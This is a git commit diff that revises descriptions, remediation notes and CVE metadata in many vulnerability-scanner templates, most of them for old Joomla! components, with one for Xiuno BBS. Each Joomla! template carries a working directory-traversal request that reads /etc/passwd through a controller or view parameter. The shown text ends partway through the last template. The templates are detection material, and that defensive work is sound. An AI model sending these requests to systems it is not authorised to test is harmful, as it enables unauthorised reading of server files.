patch-1
sandeep 2022-02-15 11:43:16 +05:30
commit 65f155f2e1
44 changed files with 214 additions and 269 deletions

View File

@ -3,15 +3,15 @@ id: CNVD-2019-01348
info: info:
name: Xiuno BBS CNVD-2019-01348 name: Xiuno BBS CNVD-2019-01348
author: princechaddha author: princechaddha
severity: medium severity: high
description: Xiuno BBS system has a system reinstallation vulnerability that could allow an attacker to directly reinstall the system through the installation page. description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page.
remediation: Upgrade to the latest version of Xiuno BBS or switch to a supported product.
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348 reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
tags: xiuno,cnvd,cnvd2019 tags: xiuno,cnvd,cnvd2019
remediation: There is currently no patch available.
classification: classification:
cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 6.5 cvss-score: 7.5
cwe-id: CWE-276 cwe-id: CWE-284
requests: requests:
- method: GET - method: GET

View File

@ -3,24 +3,24 @@ info:
name: Joomla! Component com_janews - Local File Inclusion name: Joomla! Component com_janews - Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference: reference:
- https://www.exploit-db.com/exploits/11757 - https://www.exploit-db.com/exploits/11757
- https://www.cvedetails.com/cve/CVE-2010-1219 - https://www.cvedetails.com/cve/CVE-2010-1219
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1219
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00" - "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/02/14

View File

@ -1,27 +1,26 @@
id: CVE-2010-1302 id: CVE-2010-1302
info: info:
name: Joomla! Component DW Graph - Local File Inclusion name: Joomla! Component DW Graph - Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference: reference:
- https://www.exploit-db.com/exploits/11978 - https://www.exploit-db.com/exploits/11978
- https://www.cvedetails.com/cve/CVE-2010-1302 - https://www.cvedetails.com/cve/CVE-2010-1302
tags: cve,cve2010,joomla,lfi,graph tags: cve,cve2010,joomla,lfi,graph
classification:
cve-id: CVE-2010-1302
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00" - "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/02/14

View File

@ -1,27 +1,26 @@
id: CVE-2010-1304 id: CVE-2010-1304
info: info:
name: Joomla! Component User Status - Local File Inclusion name: Joomla! Component User Status - Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference: reference:
- https://www.exploit-db.com/exploits/11998 - https://www.exploit-db.com/exploits/11998
- https://www.cvedetails.com/cve/CVE-2010-1304 - https://www.cvedetails.com/cve/CVE-2010-1304
tags: cve,cve2010,joomla,lfi,status tags: cve,cve2010,joomla,lfi,status
classification:
cve-id: CVE-2010-1304
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00" - "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/02/14

View File

@ -1,27 +1,26 @@
id: CVE-2010-1305 id: CVE-2010-1305
info: info:
name: Joomla! Component JInventory 1.23.02 - Local File Inclusion name: Joomla! Component JInventory 1.23.02 - Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference: reference:
- https://www.exploit-db.com/exploits/12065 - https://www.exploit-db.com/exploits/12065
- https://www.cvedetails.com/cve/CVE-2010-1305 - https://www.cvedetails.com/cve/CVE-2010-1305
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1305
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00" - "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/02/14

View File

@ -1,27 +1,26 @@
id: CVE-2010-1306 id: CVE-2010-1306
info: info:
name: Joomla! Component Picasa 2.0 - Local File Inclusion name: Joomla! Component Picasa 2.0 - Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference: reference:
- https://www.exploit-db.com/exploits/12058 - https://www.exploit-db.com/exploits/12058
- https://www.cvedetails.com/cve/CVE-2010-1306 - https://www.cvedetails.com/cve/CVE-2010-1306
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1306
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00" - "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/02/14

View File

@ -1,27 +1,26 @@
id: CVE-2010-1307 id: CVE-2010-1307
info: info:
name: Joomla! Component Magic Updater - Local File Inclusion name: Joomla! Component Magic Updater - Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference: reference:
- https://www.exploit-db.com/exploits/12070 - https://www.exploit-db.com/exploits/12070
- https://www.cvedetails.com/cve/CVE-2010-1307 - https://www.cvedetails.com/cve/CVE-2010-1307
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1307
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00" - "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/02/14

View File

@ -1,27 +1,26 @@
id: CVE-2010-1308 id: CVE-2010-1308
info: info:
name: Joomla! Component SVMap 1.1.1 - Local File Inclusion name: Joomla! Component SVMap 1.1.1 - Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference: reference:
- https://www.exploit-db.com/exploits/12066 - https://www.exploit-db.com/exploits/12066
- https://www.cvedetails.com/cve/CVE-2010-1308 - https://www.cvedetails.com/cve/CVE-2010-1308
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1308
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00" - "{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/02/14

View File

@ -1,27 +1,26 @@
id: CVE-2010-1312 id: CVE-2010-1312
info: info:
name: Joomla! Component News Portal 1.5.x - Local File Inclusion name: Joomla! Component News Portal 1.5.x - Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference: reference:
- https://www.exploit-db.com/exploits/12077 - https://www.exploit-db.com/exploits/12077
- https://www.cvedetails.com/cve/CVE-2010-1312 - https://www.cvedetails.com/cve/CVE-2010-1312
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1312
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00" - "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/02/14

View File

@ -1,27 +1,26 @@
id: CVE-2010-1313 id: CVE-2010-1313
info: info:
name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
remediation: Upgrade to a supported version.
reference: reference:
- https://www.exploit-db.com/exploits/12082 - https://www.exploit-db.com/exploits/12082
- https://www.cvedetails.com/cve/CVE-2010-1313 - https://www.cvedetails.com/cve/CVE-2010-1313
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1313
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00" - "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/02/14

View File

@ -1,27 +1,26 @@
id: CVE-2010-1314 id: CVE-2010-1314
info: info:
name: Joomla! Component Highslide 1.5 - Local File Inclusion name: Joomla! Component Highslide 1.5 - Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference: reference:
- https://www.exploit-db.com/exploits/12086 - https://www.exploit-db.com/exploits/12086
- https://www.cvedetails.com/cve/CVE-2010-1314 - https://www.cvedetails.com/cve/CVE-2010-1314
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1314
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00" - "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/02/14

View File

@ -1,27 +1,26 @@
id: CVE-2010-1315 id: CVE-2010-1315
info: info:
name: Joomla! Component webERPcustomer - Local File Inclusion name: Joomla! Component webERPcustomer - Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference: reference:
- https://www.exploit-db.com/exploits/11999 - https://www.exploit-db.com/exploits/11999
- https://www.cvedetails.com/cve/CVE-2010-1315 - https://www.cvedetails.com/cve/CVE-2010-1315
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1315
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00" - "{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/02/14

View File

@ -1,27 +1,26 @@
id: CVE-2010-1340 id: CVE-2010-1340
info: info:
name: Joomla! Component com_jresearch - 'Controller' Local File Inclusion name: Joomla! Component com_jresearch - 'Controller' Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference: reference:
- https://www.exploit-db.com/exploits/33797 - https://www.exploit-db.com/exploits/33797
- https://www.cvedetails.com/cve/CVE-2010-1340 - https://www.cvedetails.com/cve/CVE-2010-1340
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1340
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00" - "{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/02/14

View File

@ -1,27 +1,26 @@
id: CVE-2010-1345 id: CVE-2010-1345
info: info:
name: Joomla! Component Cookex Agency CKForms - Local File Inclusion name: Joomla! Component Cookex Agency CKForms - Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference: reference:
- https://www.exploit-db.com/exploits/15453 - https://www.exploit-db.com/exploits/15453
- https://www.cvedetails.com/cve/CVE-2010-1345 - https://www.cvedetails.com/cve/CVE-2010-1345
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1345
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00" - "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/02/14

View File

@ -1,27 +1,26 @@
id: CVE-2010-1352 id: CVE-2010-1352
info: info:
name: Joomla! Component Juke Box 1.7 - Local File Inclusion name: Joomla! Component Juke Box 1.7 - Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference: reference:
- https://www.exploit-db.com/exploits/12084 - https://www.exploit-db.com/exploits/12084
- https://www.cvedetails.com/cve/CVE-2010-1352 - https://www.cvedetails.com/cve/CVE-2010-1352
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1352
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00" - "{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/02/14

View File

@ -1,27 +1,26 @@
id: CVE-2010-1353 id: CVE-2010-1353
info: info:
name: Joomla! Component LoginBox - Local File Inclusion name: Joomla! Component LoginBox - Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. description: A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
remediation: Upgrade to a supported version.
reference: reference:
- https://www.exploit-db.com/exploits/12068 - https://www.exploit-db.com/exploits/12068
- https://www.cvedetails.com/cve/CVE-2010-1353 - https://www.cvedetails.com/cve/CVE-2010-1353
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1353
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00" - "{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/02/14

View File

@ -4,24 +4,25 @@ info:
name: Joomla! Component VJDEO 1.0 - Local File Inclusion name: Joomla! Component VJDEO 1.0 - Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference: reference:
- https://www.exploit-db.com/exploits/12102 - https://www.exploit-db.com/exploits/12102
- https://www.cvedetails.com/cve/CVE-2010-1354 - https://www.cvedetails.com/cve/CVE-2010-1354
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1354
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00" - "{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/02/14

View File

@ -4,24 +4,25 @@ info:
name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php. description: A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php.
remediation: Upgrade to a supported version.
reference: | reference: |
- https://www.exploit-db.com/exploits/12232 - https://www.exploit-db.com/exploits/12232
- https://www.cvedetails.com/cve/CVE-2010-1461 - https://www.cvedetails.com/cve/CVE-2010-1461
tags: cve,cve2010,joomla,lfi,photo tags: cve,cve2010,joomla,lfi,photo
classification:
cve-id: CVE-2010-1461
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00" - "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/02/14

View File

@ -4,24 +4,25 @@ info:
name: Joomla! Component JProject Manager 1.0 - Local File Inclusion name: Joomla! Component JProject Manager 1.0 - Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference: | reference: |
- https://www.exploit-db.com/exploits/12146 - https://www.exploit-db.com/exploits/12146
- https://www.cvedetails.com/cve/CVE-2010-1469 - https://www.cvedetails.com/cve/CVE-2010-1469
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1469
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00" - "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/02/14

View File

@ -4,24 +4,25 @@ info:
name: Joomla! Component Web TV 1.0 - Local File Inclusion name: Joomla! Component Web TV 1.0 - Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference: reference:
- https://www.exploit-db.com/exploits/12166 - https://www.exploit-db.com/exploits/12166
- https://www.cvedetails.com/cve/CVE-2010-1470 - https://www.cvedetails.com/cve/CVE-2010-1470
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1470
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00" - "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/02/14

View File

@ -4,24 +4,25 @@ info:
name: Joomla! Component Address Book 1.5.0 - Local File Inclusion name: Joomla! Component Address Book 1.5.0 - Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference: reference:
- https://www.exploit-db.com/exploits/12170 - https://www.exploit-db.com/exploits/12170
- https://www.cvedetails.com/cve/CVE-2010-1471 - https://www.cvedetails.com/cve/CVE-2010-1471
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1471
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00" - "{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/02/14

View File

@ -4,24 +4,25 @@ info:
name: Joomla! Component Horoscope 1.5.0 - Local File Inclusion name: Joomla! Component Horoscope 1.5.0 - Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference: reference:
- https://www.exploit-db.com/exploits/12167 - https://www.exploit-db.com/exploits/12167
- https://www.cvedetails.com/cve/CVE-2010-1472 - https://www.cvedetails.com/cve/CVE-2010-1472
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1472
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00" - "{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers-condition: and
matchers: matchers:
